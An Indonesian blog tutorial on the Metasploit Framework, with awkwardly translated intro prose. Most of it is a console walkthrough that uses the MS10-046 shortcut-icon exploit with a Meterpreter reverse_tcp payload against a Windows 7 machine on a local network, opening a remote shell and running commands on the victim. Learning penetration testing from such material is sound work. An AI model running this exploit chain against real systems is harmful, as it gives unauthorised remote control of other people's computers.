ONEPOIN.COM - Metasploit Framework, MSF adalah kerangka, kumpulan program dan alat-alat untuk jaringan pengujian penetrasi. Metasploit memiliki koleksi eksploitasi, muatan, perpustakaan dan interface yang dapat digunakan untuk mengeksploitasi komputer.
Metasploit memiliki koleksi besar eksploitasi dan muatan dan alat untuk paket dan mengantarkan mereka ke komputer host yang ditargetkan. Metasploit memungkinkan Anda untuk memilih mengeksploitasi dari perpustakaan, pilih payload, mengkonfigurasi target menangani, nomor port target, dan pilihan lain, dan kerangka akan paket semua bersama-sama bersama-sama, dan meluncurkannya di seluruh jaringan ke sistem target. Metasploit adalah sangat fleksibel dan dapat membantu dalam pengujian dan pengembangan eksploitasi. Yang ditulis dalam bahasa pemrograman Ruby, Metasploit juga memungkinkan pengguna untuk menulis eksploitasi dan muatan sendiri dan memasukkan mereka dalam kerangka. Metasploit adalah cross platform dan dapat berjalan di Linux, MAC OS, dan Windows dan memiliki eksploitasi dan muatan menargetkan ketiga juga.
Meterpreter - Salah satu muatan lebih kuat adalah Metasploit Interpreter atau meterpreter. Meterpreter memungkinkan pengguna untuk memiliki akses baris perintah ke mesin target tanpa menjalankan proses cmd.exe, berjalan sepenuhnya di memori melalui proses dieksploitasi.
CONTOH
Membalikkan Connection Dari target yang berjalan pada Windows 7:
Bugtraq@Ubuntu:/home/bugtraq$ sudo msfconsole
[sudo] password for bugtraq:
[*] Starting Metasploit Console...
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
Love leveraging credentials? Check out bruteforcing
=[ metasploit v4.10.0-2014082003 [core:4.10.0.pre.2014082003 api:1.0.0]]
+ -- --=[ 1339 exploits - 809 auxiliary - 228 post ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > show exploits
Exploits
========
Name Description Disclosure Date Rank
---- --------------- ---- -----------
aix/local/ibstat_path 2013-09-24 excellent ibstat $PATH Privilege Escalation
aix/rpc_cmsd_opcode21 2009-10-07 great AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
aix/rpc_ttdbserverd_realpath 2009-06-17 great ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
android/browser/webview_addjavascriptinterface 2012-12-21 normal Android Browser and WebView addJavascriptInterface Code Execution
android/fileformat/adobe_reader_pdf_js_interface 2014-04-13 good Adobe Reader for Android addJavascriptInterface Exploit
apple_ios/browser/safari_libtiff 2006-08-01 good Apple iOS MobileSafari LibTIFF Buffer Overflow
apple_ios/email/mobilemail_libtiff 2006-08-01 good Apple iOS MobileMail LibTIFF Buffer Overflow
apple_ios/ssh/cydia_default_ssh 2007-07-02 excellent Apple iOS Default SSH Password Vulnerability
bsdi/softcart/mercantec_softcart 2004-08-19 great Mercantec SoftCart CGI Overflow
dialup/multi/login/manyargs 2001-12-12 good System V Derived /bin/login Extraneous Arguments Buffer Overflow
firefox/local/exec_shellcode 2014-03-10 normal Firefox Exec Shellcode from Privileged Javascript Shell
freebsd/ftp/proftp_telnet_iac 2010-11-01 great ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
freebsd/local/mmap 2013-06-18 great FreeBSD 9 Address Space Manipulation Privilege Escalation
freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86)
freebsd/tacacs/xtacacsd_report 2008-01-08 average XTACACSD report() Buffer Overflow
freebsd/telnet/telnet_encrypt_keyid 2011-12-23 great FreeBSD Telnet Service Encryption Key ID Buffer
.............
msf > use windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > show payloads
Compatible Payloads
===================
Name Description Disclosure Date Rank
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/dllinject/bind_ipv6_tcp normal Reflective DLL Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp normal Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp normal Reflective DLL Injection, Bind TCP Stager
windows/dllinject/bind_tcp_rc4 normal Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption)
windows/dllinject/reverse_hop_http normal Reflective DLL Injection, Reverse Hop HTTP Stager
windows/dllinject/reverse_http normal Reflective DLL Injection, Reverse HTTP Stager
windows/dllinject/reverse_ipv6_tcp normal Reflective DLL Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp normal Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp normal Reflective DLL Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports normal Reflective DLL Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns normal Reflective DLL Injection, Reverse TCP Stager (DNS)
windows/dllinject/reverse_tcp_rc4 normal Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption)
windows/dllinject/reverse_tcp_rc4_dns normal Reflective DLL Injection, Reverse TCP Stage
..................................
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(ms10_046_shortcut_icon_dllloader) > show options
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The daemon port to listen on (do not change)
SSLCert no Path to a custom SSL certificate (default is randomly generated)
UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH / yes The URI to use (do not change).
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.1.10 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.10
SRVHOST => 192.168.1.10
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.10:4444
msf exploit(ms10_046_shortcut_icon_dllloader) > [*] Send vulnerable clients to \\192.168.1.10\nlyZM\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*] Using URL: http://192.168.1.10:80/
[*] Server started.
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending 404 for /nlyZM/dEgPpgDCjZL.dll.2.Manifest ...
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] Sending stage (769536 bytes) to 192.168.1.40
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/dEgPpgDCjZL.dll
[*] 192.168.1.40 ms10_046_shortcut_icon_dllloader - Sending DLL multistatus for /nlyZM/dEgPpgDCjZL.dll ...
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.40:52843) at 2015-10-09 16:42:57 +0530
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > execute -f cmd.exe -i -H
Process 4036 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::310c:8439:5772:51c8%11
IPv4 Address. . . . . . . . . . . : 192.168.1.40
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::226:15ff:fe67:e6c3%11
192.168.1.1
0 Response to "METASPLOIT FRAMEWORK"
Post a Comment